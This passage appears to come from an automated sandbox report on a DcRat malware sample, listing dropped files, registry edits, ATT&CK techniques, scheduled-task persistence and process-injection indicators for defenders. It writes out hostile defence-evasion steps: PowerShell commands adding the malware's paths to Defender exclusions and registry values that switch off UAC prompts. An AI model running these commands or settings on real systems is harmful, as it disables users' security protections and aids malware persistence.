File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\RCX23.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Internet Explorer\es-ES\sppsvc.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Windows Portable Devices\OSPPSVC.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Windows Media Player\fr-FR\f3b6ecef712a24	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\tracing\dllhost.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Windows\tracing\5940a34987c991	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Windows\tracing\RCXFE1E.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Windows\tracing\RCXFE1F.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Windows\tracing\dllhost.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b70bfc19076e654cb925859fc9923ae500000000020000000000106600000001000020000000babeb5394fa115a94f911ba042022e29964e99933ff28fd067dfd002de178a46000000000e80000000020000200000001e51e45f2d7442f9bd4748d6f1333b26b159f69adee00fa3c530127f8af0ad3b9000000026533922ce69a43fb30a436bb6107e8b21fd8986123e20c94bb0690d6a4f1fb329e20cc6d43098a4942df852734a91e82d3560e7a5ec1fbdacc5c13b786957458244c4173923b93263d7194f8b92efa69aed50c7e06cd65ad084678f3a20ecd2d3c8df7fe642ff7c285da0936dd3c2d568c4945aea769e2061d67cbef3a387e82f05e41d1270ac49eef5bb556a7364a74000000045cf29c3d8f32271b6ce6d66ecba00b85a476c7d38b724db2083fdc91aeb9c3f61a554b055adae4feed9ff4dc836c64651b16f506edc260d1eadd9dcae7e3b09	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{606E12C1-0B02-11F0-9204-FE6EB537C9A6} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "449238395"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b70bfc19076e654cb925859fc9923ae500000000020000000000106600000001000020000000acdb9b2f711f70b2ee03ecd591a42b45bec3f63ffb66ad886e22113fa05c0780000000000e80000000020000200000007f7ff446fdc1f7971dbeb7c5bc3982cec42e8d891b96799021ab8b7b24ff6023200000000c9218e4d98837f383184ba8ae840b7d8e835ad9ab427edc212cd72362665053400000009c08a2dfba600961b7fd24eeec2e5adb36df885b4e1e9a4ade3dcb19f0af0f1da2f0a0ce751e089434f6072f114cb356f7a9a4eb7ade398d38dd2fef96c1855d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 600f17390f9fdb01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2712	schtasks.exe
2436	schtasks.exe
1324	schtasks.exe
2560	schtasks.exe
2512	schtasks.exe
1188	schtasks.exe
1344	schtasks.exe
2556	schtasks.exe
1664	schtasks.exe
2220	schtasks.exe
2228	schtasks.exe
304	schtasks.exe
3036	schtasks.exe
2656	schtasks.exe
704	schtasks.exe
1408	schtasks.exe
2392	schtasks.exe
2400	schtasks.exe
2356	schtasks.exe
2996	schtasks.exe
2016	schtasks.exe
2000	schtasks.exe
2332	schtasks.exe
1336	schtasks.exe
752	schtasks.exe
2624	schtasks.exe
2336	schtasks.exe
2024	schtasks.exe
1656	schtasks.exe
2844	schtasks.exe
292	schtasks.exe
2752	schtasks.exe
1988	schtasks.exe
284	schtasks.exe
2524	schtasks.exe
2028	schtasks.exe
1520	schtasks.exe
1760	schtasks.exe
1564	schtasks.exe
2984	schtasks.exe
2876	schtasks.exe
1676	schtasks.exe
2328	schtasks.exe
3012	schtasks.exe
444	schtasks.exe
2384	schtasks.exe
1364	schtasks.exe
3000	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
1668	powershell.exe
2024	powershell.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2256	powershell.exe
2012	powershell.exe
2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2120	powershell.exe
2452	powershell.exe
3016	powershell.exe
2960	powershell.exe
888	powershell.exe
2924	powershell.exe
2972	powershell.exe
668	powershell.exe
704	powershell.exe
2124	powershell.exe
2392	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	2452	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	668	powershell.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Token: SeBackupPrivilege	1828	vssvc.exe
Token: SeRestorePrivilege	1828	vssvc.exe
Token: SeAuditPrivilege	1828	vssvc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2516	iexplore.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
2516	iexplore.exe
2516	iexplore.exe
2748	IEXPLORE.EXE
2748	IEXPLORE.EXE
2748	IEXPLORE.EXE
2748	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2484 wrote to memory of 1668	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	80
PID 2484 wrote to memory of 1668	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	80
PID 2484 wrote to memory of 1668	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	80
PID 2484 wrote to memory of 2024	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	81
PID 2484 wrote to memory of 2024	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	81
PID 2484 wrote to memory of 2024	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	81
PID 2484 wrote to memory of 3016	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	82
PID 2484 wrote to memory of 3016	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	82
PID 2484 wrote to memory of 3016	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	82
PID 2484 wrote to memory of 552	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	84
PID 2484 wrote to memory of 552	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	84
PID 2484 wrote to memory of 552	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	84
PID 2484 wrote to memory of 2256	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	86
PID 2484 wrote to memory of 2256	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	86
PID 2484 wrote to memory of 2256	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	86
PID 2484 wrote to memory of 2164	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	87
PID 2484 wrote to memory of 2164	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	87
PID 2484 wrote to memory of 2164	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	87
PID 2484 wrote to memory of 2120	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	88
PID 2484 wrote to memory of 2120	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	88
PID 2484 wrote to memory of 2120	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	88
PID 2484 wrote to memory of 2452	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	89
PID 2484 wrote to memory of 2452	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	89
PID 2484 wrote to memory of 2452	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	89
PID 2484 wrote to memory of 2012	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	90
PID 2484 wrote to memory of 2012	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	90
PID 2484 wrote to memory of 2012	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	90
PID 2484 wrote to memory of 704	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	91
PID 2484 wrote to memory of 704	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	91
PID 2484 wrote to memory of 704	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	91
PID 2484 wrote to memory of 2924	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	92
PID 2484 wrote to memory of 2924	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	92
PID 2484 wrote to memory of 2924	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	92
PID 2484 wrote to memory of 2972	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	93
PID 2484 wrote to memory of 2972	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	93
PID 2484 wrote to memory of 2972	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	93
PID 2484 wrote to memory of 2124	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	94
PID 2484 wrote to memory of 2124	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	94
PID 2484 wrote to memory of 2124	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	94
PID 2484 wrote to memory of 2392	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	95
PID 2484 wrote to memory of 2392	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	95
PID 2484 wrote to memory of 2392	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	95
PID 2484 wrote to memory of 888	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	96
PID 2484 wrote to memory of 888	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	96
PID 2484 wrote to memory of 888	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	96
PID 2484 wrote to memory of 2960	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	97
PID 2484 wrote to memory of 2960	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	97
PID 2484 wrote to memory of 2960	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	97
PID 2484 wrote to memory of 668	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	98
PID 2484 wrote to memory of 668	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	98
PID 2484 wrote to memory of 668	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	98
PID 2484 wrote to memory of 2992	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	114
PID 2484 wrote to memory of 2992	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	114
PID 2484 wrote to memory of 2992	2484	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	114
PID 2992 wrote to memory of 2968	2992	cmd.exe	116
PID 2992 wrote to memory of 2968	2992	cmd.exe	116
PID 2992 wrote to memory of 2968	2992	cmd.exe	116
PID 2992 wrote to memory of 2676	2992	cmd.exe	117
PID 2992 wrote to memory of 2676	2992	cmd.exe	117
PID 2992 wrote to memory of 2676	2992	cmd.exe	117
PID 2676 wrote to memory of 2860	2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	118
PID 2676 wrote to memory of 2860	2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	118
PID 2676 wrote to memory of 2860	2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	118
PID 2676 wrote to memory of 700	2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	119

System policy modification 1 TTPs 6 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
"C:\Users\Admin\AppData\Local\Temp\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe"
1⤵
- DcRat
- Modifies WinLogon for persistence
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\Idle.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
